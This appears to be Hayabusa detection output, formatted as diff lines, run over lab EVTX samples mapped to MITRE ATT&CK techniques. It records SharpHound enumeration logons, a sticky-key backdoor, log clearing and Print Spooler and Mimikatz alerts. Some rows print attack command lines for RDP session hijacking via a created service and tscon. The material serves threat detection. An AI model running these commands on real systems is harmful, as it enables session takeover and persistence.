+2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7ba,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f2809,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2220054d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a22,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a5a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ee5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.406 +09:00,fs01.offsec.lan,4697,info,Persis,Service Installed,Name: hijackservice | Path: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x13b593d,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
